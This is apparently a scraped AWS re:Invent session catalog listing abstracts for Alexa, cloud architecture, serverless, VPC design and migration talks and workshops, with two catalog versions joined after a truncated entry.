          As we add thousands of skills to Alexa, our developers have uncovered some basic and more complex tips for building better skills. Whether you are new to Alexa skill development or if you have created skills that are live today, this session helps you understand how to create better voice experiences. Last year, Capital One joined Alexa on stage at re:Invent to talk about their experience building an Alexa skill. Hear from them one year later to learn from the challenges that they had to overcome and the results they are seeing from their skill. In this session, you will learn the importance of flexible invocations, better VUI design, how OAuth and account linking can add value to your skill, and about Capital One's experience building an Alexa skill.
          ALX202 - How Amazon is enabling the future of Automotive
          The experience in the auto industry is changing. For both the driver and the car manufacturer, a whole new frontier is on the near horizon. What do you do with your time while the car is driving itself? How do I have a consistent experience while driving shared or borrowed cars? How do I stay safer and more aware in the ever increasing complexity of traffic, schedules, calls, messages and tweets? In this session we will discuss how the auto industry is facing new challenges and how the use of Amazon Alexa, IoT, Logistics services and the AWS Cloud is transforming the Mobility experience of the (very near) future.
          ALX203 - Workshop: Creating Voice Experiences with Alexa Skills: From Idea to Testing in Two Hours
          This workshop teaches you how to build your first voice skill with Alexa. You bring a skill idea and well show you how to bring it to life. This workshop will walk you through how to build an Alexa skill, including Node.js setup, how to implement an intent, deploying to AWS Lambda, and how to register and test a skill. Youll walk out of the workshop with a working prototype of your skill idea. Prerequisites: Participants should have an AWS account established and available for use during the workshop. Please bring your own laptop.
          ALX204 - Workshop: Build an Alexa-Enabled Product with Raspberry Pi
          Fascinated by Alexa, and want to build your own device with Alexa built in? This workshop will walk you through to how to build your first Alexa-powered device step by step, using a Raspberry Pi. No experience with Raspberry Pi or Alexa Voice Service is required. We will provide you with the hardware and the software required to build this project, and at the end of the workshop, you will be able to walk out with a working prototype of Alexa on a Pi. Please bring a WiFi capable laptop.
          ALX301 - Alexa in the Enterprise: How JPL Leverages Alexa to Further Space Exploration with Internet of Things
          The Jet Propulsion Laboratory designs and creates some of the most advanced space robotics ever imagined. JPL IT is now innovating to help streamline how JPLers will work in the future in order to design, build, operate, and support these spacecraft. They hope to dramatically improve JPLers' workflows and make their work easier for them by enabling simple voice conversations with the room and the equipment across the entire enterprise. What could this look like? Imagine just talking with the conference room to configure it. What if you could kick off advanced queries across AWS services and kick off AWS Kinesis tasks by simply speaking the commands? What if the laboratory could speak to you and warn you about anomalies or notify you of trends across your AWS infrastructure? What if you could control rovers by having a conversation with them and ask them questions? In this session, JPL will demonstrate how they leveraged AWS Lambda, DynamoDB and CloudWatch in their prototypes of these use cases and more. They will also discuss some of the technical challenges they are overcoming, including how to deploy and manage consumer devices such as the Amazon Echo across the enterprise, and give lessons learned. Join them as they use Alexa to query JPL databases, control conference room equipment and lights, and even drive a rover on stage, all with nothing but the power of voice!
          ALX302 - Build a Serverless Back End for Your Alexa-Based Voice Interactions
          Learn how to develop voice-based serverless back ends for Alexa Voice Service (AVS) and Alexa devices using the Alexa Skills Kit (ASK), which allows you to add new voice-based interactions to Alexa. Well code a new skill, implemented by a serverless backend leveraging AWS services such as Amazon Cognito, AWS Lambda, and Amazon DynamoDB. Often, your skill needs to authenticate your users and link them back to your backend systems and to persist state between user invocations. User authentication is performed by leveraging OAuth compatible identity systems. Running such a system on your back end requires undifferentiated heavy lifting or boilerplate code. Well leverage Login with Amazon as the identity provider instead, allowing you to focus on your application implementation and not on the low-level user management parts. At the end of this session, youll be able to develop your own Alexa skills and use Amazon and AWS services to minimize the required backend infrastructure. This session shows you how to deploy your Alexa skill code on a serverless infrastructure, leverage AWS Lambda, use Amazon Cognito and Login with Amazon to authenticate users, and leverage AWS DynamoDB as a fully managed NoSQL data store.
          ALX303 - Building a Smarter Home with Alexa
          Natural user interfaces, such as those based on speech, enable customers to interact with their home in a more intuitive way. With the VUI (Voice User Interface) smart home, now customers don't need to use their hands or eyes to do things around the home they only have to ask and it's at their command. This session will address the vision for the VUI smart home and how innovations with Amazon Alexa make it possible.
          ALX304 - Tips and Tricks on Bringing Alexa to Your Products
          Ever wonder what it takes to add the power of Alexa to your own products? Are you curious about what Alexa partners have learned on their way to a successful product launch? In this session you will learn about the top tips and tricks on how to go from VUI newbie to an Alexa-enabled product launch. Key concepts around hardware selection, enabling far field voice interaction, building a robust Alexa Voice Service (AVS) client and more will be discussed along with customer and partner examples on how to plan for and avoid common challenges in product design, development and delivery.
          ALX305 - From VUI to QA: Building a Voice-Based Adventure Game for Alexa
          Hitting the submit button to publish your skill is similar to sending your child to their first day of school. You want it to be set up for a successful launch day and for many days thereafter. Learn how to set your skill up for success from Andy Huntwork, Alexa Principal Engineer and one of the creators of the popular Alexa skill The Magic Door. You will learn the most common reasons why skills fail and also some of the more unique use cases. The purpose of this session is to help you build better skills by knowing what to look out for and what you can test for before submitting. In this session, you will learn what most developers do wrong, how to successfully test and QA your skill, how to set your skill up for successful certification, and the process of how a skill gets certified.
          ALX306 - State of the Union: Amazon Alexa and Recent Advances in Conversational AI
          The way humans interact with machines is at a turning point, and conversational artificial intelligence (AI) is at the center of the transformation. Learn how Amazon is using machine learning and cloud computing to fuel innovation in AI, making Amazon Alexa smarter every day. Alexa VP and Head Scientist Rohit Prasad presents the state of the union Alexa and Recent Advances in Conversational AIn for Alexa. He addresses Alexa's advances in spoken language understanding and machine learning, and shares Amazon's thoughts about building the next generation of user experiences.
          ALX307 - Voice-enabling Your Home and Devices with Amazon Alexa and AWS IoT
          Want to learn how to Alexa-power your home? Join Brookfield Residential CIO and EVP Tom Wynnyk and Senior Solutions Architect Nathan Grice, for Alexa Smart Homefor an overview of building the next generation of integrated smart homes using Alexa to create voice-first experiences. Understand the technologies used and how to best expose voice experiences to users through Alexa. Paul and Nathan cover the difference between custom Alexa skills and Smart Home Skill API skills, and build a home automation control from the ground up using Alexa and AWS IoT.
          ARC201 - Scaling Up to Your First 10 Million Users
          Cloud computing gives you a number of advantages, such as the ability to scale your web application or website on demand. If you have a new web application and want to use cloud computing, you might be asking yourself, "Where do I start?" Join us in this session to understand best practices for scaling your resources from zero to millions of users. We show you how to best combine different AWS services, how to make smarter decisions for architecting your application, and how to scale your infrastructure in the cloud.
          ARC202 - Accenture Cloud Platform Serverless Journey
          Accenture Cloud Platform helps customers manage public and private enterprise cloud resources effectively and securely. In this session, learn how we designed and built new core platform capabilities using a serverless, microservices-based architecture that is based on AWS services such as AWS Lambda and Amazon API Gateway. During our journey, we discovered a number of key benefits, including a dramatic increase in developer velocity, a reduction (to almost zero) of reliance on other teams, reduced costs, greater resilience, and scalability. We describe the (wild) successes weve had and the challenges weve overcome to create an AWS serverless architecture at scale. Session sponsored by Accenture. AWS Competency Partner
          ARC203 - Achieving Agility by Following Well-Architected Framework Principles on AWS
          The AWS Well-Architected Framework enables customers to understand best practices around security, reliability, performance, and cost optimization when building systems on AWS. This approach helps customers make informed decisions and weigh the pros and cons of application design patterns for the cloud. In this session, you'll learn how National Instruments used the Well-Architected Framework to follow AWS guidelines and best practices. By developing a strategy based on the AWS Well-Architected Framework, National Instruments was able to triple the number of applications running in the cloud without additional head count, significantly increase the frequency of code deployments, and reduce deployment times from two weeks to a single day. As a result, National Instruments was able to deliver a more scalable, dynamic, and resilient LabVIEW platform with agility.
          ARC204 - From Resilience to Ubiquity - #NetflixEverywhere Global Architecture
          Building and evolving a pervasive, global service requires a multi-disciplined approach that balances requirements with service availability, latency, data replication, compute capacity, and efficiency. In this session, well follow the Netflix journey of failure, innovation, and ubiquity. We'll review the many facets of globalization and then delve deep into the architectural patterns that enable seamless, multi-region traffic management; reliable, fast data propagation; and efficient service infrastructure. The patterns presented will be broadly applicable to internet services with global aspirations.
          ARC205 - Born in the Cloud; Built Like a Startup
          This presentation provides a comparison of three modern architecture patterns that startups are building their business around. It includes a realistic analysis of cost, team management, and security implications of each approach. It covers Elastic Beanstalk, Amazon ECS, Docker, Amazon API Gateway, AWS Lambda, Amazon DynamoDB, and Amazon CloudFront, as well as Docker.
          ARC207 - NEW LAUNCH! Additional transparency and control for your AWS environment through AWS Personal Health Dashboard
          When your business is counting on the performance of your cloud solutions, having relevant and timely insights into events impacting your AWS resources is essential. AWS Personal Health Dashboard serves as the primary destination for you to receive personalized information related to your AWS infrastructure, guiding your through scheduled changes, and accelerating the troubleshooting of issues impacting your AWS resources. The service, powered by AWS Health APIs, integrates with your in-house event management systems, and can be programmatically configured to proactively get the right information into the right hands at the right time. The service is integrated with Splunk App for AWS to enhance Splunks dashboards, reports and alerts to deliver real-time visibility into your environment.
          ARC208 - Hybrid Architectures: Bridging the Gap to the Cloud
          AWS provides many services to assist customers with their journey to the cloud. Hybrid solutions offer customers a way to continue leveraging existing investments on-premises, while expanding their footprint into the public cloud. This session covers the different technologies available to support hybrid architectures on AWS. We discuss common patterns and anti-patterns for solving enterprise workloads across a hybrid environment.
          ARC209 - Attitude of Iteration
          In todays world, technology changes at a breakneck speed. What was new this morning is outdated at lunch. Working in the AWS Cloud is no different. Every week, AWS announces new features or improvements to current products. As AWS technologists, we must assimilate these new technologies and make decisions to adopt, reject, or defer. These decisions can be overwhelming: we tend to either reject everything and become stagnant, or adopt everything and never get our project out the door. In this session we will discuss the attitude of iteration. The attitude of iteration allows us to face the challenges of change without overwhelming our technical teams with a constant tug-o-war between implementation and improvement. Whether youre an architect, engineer, developer, or AWS newbie, prepare to laugh, cry, and commiserate as we talk about overcoming these challenges. Session sponsored by Rackspace.
          ARC210 - Workshop: Addressing Your Business Needs with AWS
          Come and participate with other AWS customers as we focus on the overall experience of using AWS to solve business problems. This is a great opportunity to collaborate with existing and prospective AWS users to validate your thinking and direction with AWS peers, discuss the resources that aid AWS solution design, and give direct feedback on your experience building solutions on AWS.
          ARC211 - Solve common problems with ready to use solutions in 5 minutes or less
          Regularly, customers at AWS assign resources to create solutions that address common problems shared between businesses of all sizes. Often, this results in taking resources away from products or services that truly differentiate the business in the marketplace. The Solutions Builder team at AWS focuses on developing and publishing a catalog of repeatable, standardized solutions that can be rapidly deployed by customers to overcome common business challenges. In this session, the Solutions Builder team will share ready to use solutions that make it easy for anyone to create a transit VPC, centralized logging, a data lake, scheduling for Amazon EC2, and VPN monitoring. Along the way, the team reveals the architectural tenets and best practices they follow for the development of these solutions. In the end, customers are introduced to a catalog of freely available solutions with a peek into the architectural approaches used by an internal team at AWS.
          ARC212 - Salesforce: Helping Developers Deliver Innovations Faster
          Salesforce is one of the most innovative enterprise software companies in the world, delivering 3 major releases a year with hundreds of features in each release. In this session, come learn how we enable thousands of engineers within Salesforce to utilize a flexible development environment to deliver these innovations to our customers faster. We show you how we enable engineers at Salesforce to test not only individual services they are developing but also large scale service integrations. Also learn how we can achieve setup of a representative production environment in minutes and teardown in seconds, using AWS.
          ARC213 - Open Source at AWS—Contributions, Support, and Engagement
          Over the last few years, we have seen a dramatic increase in the use of open source projects as the mainstay of architectures in both startups and enterprises. Many of our customers and partners also run their own open source programs and contribute key technologies to the industry as a whole (see DCS201). At AWS weengage with open source projects in a number of ways. Wecontribute bug fixesand enhancementstopopular projectsincluding ourwork with the Hadoop ecosystem (see BDM401), Chromium(see BAP305) and (obviously) Boto.We have our own standalone projectsincludingthe security library s2n (see NET405)and machine learning project MXnet (see MAC401).Wealsohave services that make open source easier to use like ECS for Docker (see CON316), and RDS for MySQL and PostgreSQL (see DAT305).In this session you will learn about our existing open source work across AWS, and our next steps.
          ARC301 - Architecting Next Generation SaaS Applications on AWS
          AWS provides a broad array of services, tools, and constructs that can be used to design, operate, and deliver SaaS applications. In this session, Tod Golding, the AWS Partner Solutions Architect, shares the wisdom and lessons learned from working with dozens of customers and partners building SaaS solutions on AWS. We discuss key architectural strategies and patterns that are used to deliver multi-tenant SaaS models on AWS and dive into the full spectrum of SaaS design and architecture considerations, including tenant isolation models, tenant identity management, serverless SaaS, and multi-tenant storage strategies. This session connects the dots between general SaaS best practices and what it means to realize these patterns on AWS, weighing the architectural tradeoffs of each model and assessing its influence on the agility, manageability, and cost profile of your SaaS solution.
          ARC302 - From One to Many: Evolving VPC Design
          As more customers adopt Amazon VPC architectures, the features and flexibility of the service are squaring off against evolving design requirements. This session follows this evolution of a single regional VPC into a multi-VPC, multi-region design with diverse connectivity into on-premises systems and infrastructure. Along the way, we investigate creative customer solutions for scaling and securing outbound VPC traffic, securing private access to Amazon S3, managing multi-tenant VPCs, integrating existing customer networks through AWS Direct Connect, and building a full VPC mesh network across global regions.
          ARC303 - Cloud Monitoring - Understanding, Preparing, and Troubleshooting Dynamic Apps on AWS
          Applications running in a typical data center are static entities. Dynamic scaling and resource allocation are the norm in AWS. Technologies such as Amazon EC2, Docker, AWS Lambda, and Auto Scaling make tracking resources and resource utilization a challenge. The days of static server monitoring are over. In this session, we examine trends weve observed across thousands of customers using dynamic resource allocation and discuss why dynamic infrastructure fundamentally changes your monitoring strategy. We discuss some of the best practices weve learned by working with New Relic customers to build, manage, and troubleshoot applications and dynamic cloud services. Session sponsored by New Relic. AWS Competency Partner
          ARC304 - Effective Application Data Analytics for Modern Applications
          IT is evolving from a cost center to a source of continuous innovation for business. At the heart of this transition are modern, revenue-generating applications, based on dynamic architectures that constantly evolve to keep pace with end-customer demands. This dynamic application environment requires a new, comprehensive approach to traditional monitoring one based on real-time, end-to-end visibility and analytics across the entire application lifecycle and stack, instead of monitoring by piecemeal. This presentation highlights practical advice on how developers and operators can leverage data and analytics to glean critical information about their modern applications. In this session, we will cover the types of data important for todays modern applications. Well discuss visibility and analytics into data sources such as AWS services (e.g., Amazon CloudWatch, AWS Lambda, VPC Flow Logs, Amazon EC2, Amazon S3, etc.), development tool chain, and custom metrics, and describe how to use analytics to understand business performance and behaviors. We discuss a comprehensive approach to monitoring, troubleshooting, and customer usage insights, provide examples of effective data analytics to improve software quality, and describe an end-to-end customer use case that highlights how analytics applies to the modern app lifecycle and stack. Session sponsored by Sumo Logic. AWS Competency Partner
          ARC305 - From Monolithic to Microservices: Evolving Architecture Patterns in the Cloud
          Gilt, a global e-commerce company, implemented a sophisticated microservices architecture on AWS to handle millions of customers visiting their site at noon every day. The microservices architecture pattern enables independent service scaling, faster deployments, better fault isolation, and graceful degradation. In this session, Emerson Loureiro, Sr. Software Engineer at Gilt, will share Gilt's experiences and lessons learned during their evolution from a single monolithic Rails application in a traditional data center to more than 300 Scala/Java microservices deployed in the cloud.Derek Chiles, AWS Solutions Architect, will review best practices and recommended architectures for deploying microservices on AWS.
          ARC306 - Event Handling at Scale: Designing an Auditable Ingestion and Persistence Architecture for 10K+ events/second
          How does McGraw-Hill Education use the AWS platform to scale and reliably receive 10,000 learning events per second? How do we provide near-real-time reporting and event-driven analytics for hundreds of thousands of concurrent learners in a reliable, secure, and auditable manner that is cost effective? MHE designed and implemented a robust solution that integrates AWS API Gateway, AWS Lambda, Amazon Kinesis, Amazon S3, Amazon Elasticsearch Service, Amazon DynamoDB, HDFS, Amazon EMR, Amazopn EC2, and other technologies to deliver this cloud-native platform across the US and soon the world. This session describes the challenges we faced, architecture considerations, how we gained confidence for a successful production roll-out, and the behind-the-scenes lessons we learned.
          ARC307 - Accelerating Next Generation Healthcare Business on the AWS Cloud
          Hear Geneia's design principles for using multiple technologies like Elastic Load Balancing and Auto Scaling in end-to-end solutions to meet regulatory requirements. Explore how to meet HIPAA regulations by using native cloud services like Amazon EC2, Amazon EBS volumes, encryption services, and monitoring features in addition to third-party tools to ensure end-to-end data protection, privacy, and security for protected health information (PHI) data hosted in the AWS Cloud. Learn how Geneia leveraged multiregion and multizone backup and disaster recovery solutions to address the recovery time objective (RTO) and recovery point objective (RPO) requirements. Discover how automated build, deployment, provisioning, and virtual workstations in the cloud enabled Geneia's developers and data scientists to quickly provision resources and work from any location, expediting the onboarding of customers, getting to market faster, and capturing bigger market share in healthcare analytics while minimizing costs. Session sponsored by Cognizant. AWS Competency Partner
          ARC308 - Metering Big Data at AWS: From 0 to 100 Million Records in 1 Second
          Learn how AWS processes millions of records per second to support accurate metering across AWS and our customers. This session shows how we migrated from traditional frameworks to AWS managed services to support a large processing pipeline. You will gain insights on how we used AWS services to build a reliable, scalable, and fast processing system using Amazon Kinesis, Amazon S3, and Amazon EMR. Along the way we dive deep into use cases that deal with scaling and accuracy constraints. Attend this session to see AWSs end-to-end solution that supports metering at AWS.
          ARC309 - Moving Mission Critical Apps from One Region to Multi-Region active/active
          In gaming, low latencies and connectivity are bare minimum expectations users have while playing online on PlayStation Network. Alex and Dustin share key architectural patterns to provide low latency, multi-region services to global users. They discuss the testing methodologies and how to programmatically map out a large dependency multi-region deployment with data-driven techniques. The patterns shared show how to adapt to changing bottlenecks and sudden, several million request spikes. Youll walk away with several key architectural patterns that can service users at global scale while being mindful of costs.
          ARC310 - Cost Optimizing Your Architecture: Practical Design Steps For Big Savings
          Did you know that AWS enables builders to architect solutions for price? Beyond the typical challenges of function, performance, and scale, you can make your application cost effective. Using different architectural patterns and AWS services in concert can dramatically reduce the cost of systems operation and per-transaction costs. This session uses practical examples aimed at architects and developers. Using code and AWS CloudFormation in concert with services such as Amazon EC2, Amazon ECS, Lambda, Amazon RDS, Amazon SQS, Amazon SNS, Amazon S3, CloudFront, and more, we demonstrate the financial advantages of different architectural decisions. Attendees will walk away with concrete examples, as well as a new perspective on how they can build systems economically and effectively. Attendees at this session will receive a free 30 day trial of AWS Trusted Advisor.
          ARC311 - Evolving a Responsive and Resilient Architecture to Analyze Billions of Metrics
          Nike+ is at the core of the Nike digital product ecosystem, providing services to enhance your athletic experience through quantified activity tracking and gamification. As one of the first movers at Nike to migrate out of the datacenter to AWS, they share the evolution in building a reactive platform on AWS to handle large, complex data sets. They provide a deep technical view of how they process billions of metrics a day in their quantified-self platform, supporting millions of customers worldwide. Youll leave with ideas and tools to help your organization scale in the cloud. Come learn from experts who have built an elastic platform using Java, Scala, and Akka, leveraging the power of many AWS technologies like Amazon EC2, ElastiCache, Amazon SQS, Amazon SNS, DynamoDB, Amazon ES, Lambda, Amazon S3, and a few others that helped them (and can help you) get there quickly.
          ARC312 - Compliance Architecture: How Capital One Automates the Guard Rails for 6,000 Developers
          What happens when you give 6,000 developers access to the cloud? Introducing Cloud Custodian, an open source project from Capital One, which provides a DSL for AWS fleet management that operates in real-time using CloudWatch Events and Lambda. Cloud Custodian is used for the gamut of compliance, encryption, and cost optimization. What can it do for you?
          ARC313 - Running Lean Architectures: How to Optimize for Cost Efficiency
          Whether youre a cash-strapped startup or an enterprise optimizing spend, it pays to run cost-efficient architectures on AWS. This session reviews a wide range of cost planning, monitoring, and optimization strategies, featuring real-world experience from AWS customers. We cover how to effectively combine Amazon EC2 On-Demand, Reserved, and Spot instances to handle different use cases; leveraging Auto Scaling to match capacity to workload; choosing the optimal instance type through load testing; taking advantage of Multi-AZ support; and using Amazon CloudWatch to monitor usage and automatically shut off resources when they are not in use. We discuss taking advantage of tiered storage and caching, offloading content to Amazon CloudFront to reduce back-end load, and getting rid of your back end entirely by leveraging AWS high-level services. We also showcase simple tools to help track and manage costs, including Cost Explorer, billing alerts, and AWS Trusted Advisor. This session is your pocket guide for running cost effectively in the Amazon Cloud. Attendees of this session receive a free 30-day trial of enterprise-level Trusted Advisor.
          ARC314 - Enabling Enterprise Migrations: Creating an AWS Landing Zone
          With customers migrating workloads to AWS, we are starting to see a need for the creation of a prescribed landing zone, which uses native AWS capabilities and meets or exceeds customers' security and compliance objectives. In this session, we will describe an AWS landing zone and will cover solutions for account structure, user configuration, provisioning, networking and operation automation. This solution is based on AWS native capabilities such as AWS Service Catalog, AWS Identity and Access Management, AWS Config Rules, AWS CloudTrail and Amazon Lambda. We will provide an overview of AWS Service Catalog and how it be used to provide self-service infrastructure to applications users, including various options for automation. After this session you will be able to configure an AWS landing zone for successful large scale application migrations. Additionally, Philips will explain their cloud journey and how they have applied their guiding principles when building their landing zone.
          ARC315 - The Enterprise Fast Lane - What Your Competition Doesn't Want You To Know About Enterprise Cloud Transformation
          Fed up with stop and go in your data center? Shift into overdrive and pull into the fast lane! Learn how AutoScout24, the largest online car marketplace Europe-wide, are building their Autobahn in the Cloud. The secret ingredient? Culture! Because Cloud is only one half of the digital transformation story: The other half is how your organization deals with cultural change as you transition from the old world of IT into building microservices on AWS with agile DevOps teams in a true you build it you run it fashion. Listen to stories from the trenches, powered by Amazon Kinesis, Amazon DynamoDB, AWS Lambda, Amazon ECS, Amazon API Gateway and much more, backed by AWS Partners, AWS Professional Services, and AWS Enterprise Support. Key takeaways: How to become Cloud native, evolve your architecture step by step, drive cultural change across your teams, and manage your companys transformation for the future.
          ARC316 - Hybrid IT: A Stepping Stone to All-In
          This session demonstrates how customers can leverage hybrid IT as a transitional step on the path to going all-in on AWS. We provide a step-by-step walk-through focusing on seamless migration to the cloud, with consideration given to existing data centers, equipment, and staff retraining. Learn about the suite of capabilities AWS provides to ease and simplify your journey to the cloud.
          ARC318 - Busting the Myth of Vendor Lock-In: How D2L Embraced the Lock and Opened the Cage
          When D2L first moved to the cloud, we were concerned about being locked-in to one cloud provider. We were compelled to explore the opportunities of the cloud, so we overcame our perceived risk, and turned it into an opportunity by self-rolling tools and avoiding AWS native services. In this session, you learn how D2L tried to bypass the lock buteventually embraced itand opened the cage. Avoiding AWS native tooling and pure lifts of enterprise architecture caused a drastic inflation of costs. Learn how we shifted away from a self-rolled lift into an efficient and effective shift while prioritizing cost, client safety, AND speed of development. Learn from D2L'ssuccesses and missteps, and convert your own enterprise systems into the cloud both through native cloud births and enterprise conversions. This session discusses D2Ls use of Amazon EC2 (with aguest appearance by Reserved Instances), Elastic Load Balancing, Amazon EBS, Amazon DynamoDB, Amazon S3, AWS CloudFormation, AWS CloudTrail, Amazon CloudFront, AWS Marketplace, Amazon Route 53, AWS Elastic Beanstalk, and Amazon ElastiCache.
          ARC319 - Datapipe Open Source: Image Development Pipeline
          For an IT organization to be successful in rapid cloud assessment or iterative migration of their infrastructure and applications to AWS, they need to effectively plan and execute on a strategic cloud strategy that focuses not only on cloud, but also big data, DevOps, and security.Session sponsored by Datapipe. AWS Competency Partner
          ARC320 - Workshop: AWS Professional Services Effective Architecting Workshop
          The AWS Professional Services team will be facilitating an architecture workshop exercise for certified AWS Architects. Class size will be limited to 48. This workshop will be a highly interactive architecture design exercise where the class will be randomly divided into teams and given a business case for which they will need to design an effective AWS solution. Past participants have found the interaction with people from other organizations and the creative brainstorming that occurs across 6 different teams greatly enhances the learning experience. Flipcharts will be provided and students are encouraged to bring their laptops to document their designs. Each team will be expected to present their solution to the class.
          ARC402 - Serverless Architectural Patterns and Best Practices
          As serverless architectures become more popular, AWS customers need a framework of patterns to help them deploy their workloads without managing servers or operating systems. This session introduces and describes four re-usable serverless patterns for web apps, stream processing, batch processing, and automation. For each, we provide a TCO analysis and comparison with its server-based counterpart. We also discuss the considerations and nuances associated with each pattern and have customers share similar experiences. The target audience is architects, system operators, and anyone looking for a better understanding of how serverless architectures can help them save money and improve their agility.
          ARC403 - Building a Microservices Gaming Platform for Turbine Mobile Games
          Warner Bros Turbine team shares lessons learned from their enhanced microservices game platform, which uses Docker, Amazon EC2, Elastic Load Balancing, and Amazon ElastiCache to scale up in anticipation of massive game adoption. Learn about their Docker-based microservices architecture, tuned and optimized to support the demands of the massively popular [Batman: Arkham Underworld and other franchises]. Turbine invent and simplify microservices persistence services consolidating their previous NoSQL database solution with highly performant PostgreSQL on Amazon EC2 and Amazon EBS. Turbine also describes other innovative strategies, including integrated analytic techniques to anticipate and predict their scaling operations.
          ARC404 - Migrating a Highly Available and Scalable Database from Oracle to Amazon DynamoDB with code):


          WRK307 - A Well-Architected Workshop: Working with the AWS Well-Architected Framework
          This workshop describes the AWS Well-Architected Framework, which enables customers to assess and improve their cloud architectures and better understand the business impact of their design decisions. It address general design principles, best practices, and guidance in four pillars of the Well-Architected Framework.  We will work in teams, assisted by AWS Solutions Architects, to review an example architecture, identifying issues, and how to improve the system.  You will need to have architecture experience to get the most from this workshop. After attending this workshop you will be able to review an architecture and identify potential issues across the four pillars of Well-Architected: security, performance efficiency, reliability, and cost optimization. Prerequisites: Architecture experience.  Optional - review the AWS Well-Architected Framework whitepaper. Capacity: To encourage the interactive nature of this workshop, the session capacity is limited to approximately 70 attendees.  Attendance is based on a first come, first served basis once onsite.  Scheduling tools in the session catalog are for planning purposes only. View Less
          WRK306 - AWS Professional Services Architecting Workshop
          The AWS Professional Services team will be facilitating an architecture workshop exercise for certified AWS architects, with a class size limited to 40. In this highly interactive architecture design exercise, the class will be randomly divided into teams and given a business case for which to design an effective AWS solution. Flipcharts will be provided, and students are encouraged to bring their laptops to document their designs. Each team will be expected to present their solution to the class. Prerequisites: Participants should be certified AWS Architects.  Bring your laptop. Capacity: To encourage the interactive nature of this workshop, the session capacity is limited to approximately 40 attendees.  The session will be offered twice on October 7 and twice on October 8, using the same case study for each to allow for scheduling flexibility.   Attendance is based on a first come, first served basis once onsite.  Scheduling tools in the session catalog are for planning purposes only. View Less
          ARC403 - From One to Many: Evolving VPC Design
          As more customers adopt Amazon VPC architectures, the features and flexibility of the service are squaring off against evolving design requirements. This session follows this evolution of a single regional VPC into a multi-VPC, multiregion design with diverse connectivity into on-premises systems and infrastructure. Along the way, we investigate creative customer solutions for scaling and securing outbound VPC traffic, securing private access to S3, managing multitenant VPCs, integrating existing customer networks through AWS Direct Connect and building a full VPC mesh network across global regions. View Less
          ARC402 - Double Redundancy with AWS Direct Connect
          AWS Direct Connect provides low latency and high performance connectivity to the AWS cloud by allowing the provision of physical fiber from the customer's location or data center into AWS Direct Connect points of presence. This session covers design considerations around AWS Direct Connect solutions. We will discuss how to design and configure physical and logical redundancy using both physically redundant fibers and logical VPN connectivity, and includes a live demo showing both the configuration and the failure of a doubly redundant connectivity solution. This session is for network engineers/architects, technical professionals, and infrastructure managers who have a working knowledge of Amazon VPC, Amazon EC2, general networking, and routing protocols. View Less
          ARC401 - Cloud First: New Architecture for New Infrastructure
          What do companies with internal platforms have to change to succeed in the cloud? The five pillars at the heart of IT solutions in the cloud are automation, fault tolerance, horizontal scalability, security, and cost-effectiveness. This talk discusses tools that facilitate the development and automate the deployment of secure, highly available microservices. The tools were developed using AWS CloudFormation, AWS SDKs, AWS CLI, Amazon RDS, and various open-source software such as Docker. The talk provides concrete examples of how these tools can help developers and architects move from beginning/intermediate AWS practitioners to cloud deployment experts. View Less
          ARC348 - Seagull: How Yelp Built a Highly Fault-tolerant Distributed System for Concurrent Task Execution
          Efficiently parallelizing mutually exclusively tasks can be a challenging problem when done at scale. Yelp's recent in-house product, Seagull, demonstrates how an intelligent scheduling system can use several open-source products to provide a highly scalable and fault-tolerant distributed system. Learn how Yelp built Seagull with a variety of Amazon Web Services to concurrently execute thousands of tasks that can greatly improve performance. Seagull combines open-source software like ElasticSearch, Mesos, Docker, and Jenkins with Amazon Web Services (AWS) to parallelize Yelp's testing suite. Our current use case of Seagull involves distributively running Yelp's test suite that has over 55,000 test cases. Using our smart scheduling, we can run one of our largest test suites to process 42 hours of serial work in less than 10 minutes using 200 r3.8xlarge instances from Amazon Elastic Compute Cloud (Amazon EC2). Seagull consumes and produces data at very high rates. On a typical day, Seagull writes 60 GBs of data and consumes 20 TBs of data. Although we are currently using Seagull to parallelize test execution, it can efficiently parallelize other types of independent tasks. View Less
          ARC346-APAC - Scaling to 25 Billion Daily Requests Within 3 Months: Building a Global Big Data Distribution Platform on AWS (APAC track)
          What if you were told that within three months, you had to scale your existing platform from 1,000 req/sec (requests per second) to handle 300,000 req/sec with an average latency of 25 milliseconds? And that you had to accomplish this with a tight budget, expand globally, and keep the project confidential until officially announced by well-known global mobile device manufacturers? That's what exactly happened to us. This session explains how The Weather Company partnered with AWS to scale our data distribution platform to prepare for unpredictable global demand. We cover the many challenges that we faced as we worked on architecture design, technology and tools selection, load testing, deployment and monitoring, and how we solved these challenges using AWS. This is a repeat session that will be translated simultaneously into Japanese, Chinese, and Korean. View Less
          ARC346 - Scaling to 25 Billion Daily Requests Within 3 Months: Building a Global Big Data Distribution Platform on AWS
          What if you were told that within three months, you had to scale your existing platform from 1,000 req/sec (requests per second) to handle 300,000 req/sec with an average latency of 25 milliseconds? And that you had to accomplish this with a tight budget, expand globally, and keep the project confidential until officially announced by well-known global mobile device manufacturers? That's what exactly happened to us. This session explains how The Weather Company partnered with AWS to scale our data distribution platform to prepare for unpredictable global demand. We cover the many challenges that we faced as we worked on architecture design, technology and tools selection, load testing, deployment and monitoring, and how we solved these challenges using AWS. View Less
          ARC344 - How Intuit Improves Security and Productivity with AWS Virtual Networking, identity, and Account Services
          Intuit has an "all in" strategy in adopting the AWS cloud. We have already moved some large workloads supporting some of our flagship products (TurboTax, Mint) and are expecting to launch hundreds of services in AWS over the coming years. To provide maximum flexibility for product teams to iterate on their services, as well as provide isolation of individual accounts from logical errors or malicious actions, Intuit is deploying every application into its own account and virtual private cloud (VPC). This talk discusses both the benefits and challenges of designing to run across hundreds or thousands of VPCs within an enterprise. We discuss the limitations of connectivity, sharing data, strategies for IAM access across account, and other nuances to keep in mind as you design your organization's migration strategy. We share our design patterns that can help guide your team in developing a plan for your AWS migration. This talk is helpful for anyone who is planning or in the process of moving a large enterprise to AWS with the difficult decisions and tradeoffs in structuring your deployment. View Less
          ARC342 - Closing the Loop: Designing and Building an End-to-End Email Solution Using AWS
          Email continues to be a critical medium for communications between businesses and customers and remains an important channel for building automation around sending and receiving messages. Email automation enables use cases like updating a ticketing system or a forum via email, logging and auditing an email conversation, subscribing and unsubscribing from email lists via email, transferring small files via email, and updating email contents before delivery. This session implements and presents live code that covers a use case supported by Amazon.com's seller business: how to protect your customers' privacy by anonymizing email for third-party business-to-business communication on your platform. With Amazon SES and the help of Amazon S3, AWS Lambda, and Amazon DynamoDB, we cover architecture, walk through code as we build an application live, and present a demonstration of the final implementation. View Less
          ARC340 - Multi-tenant Application Deployment Models
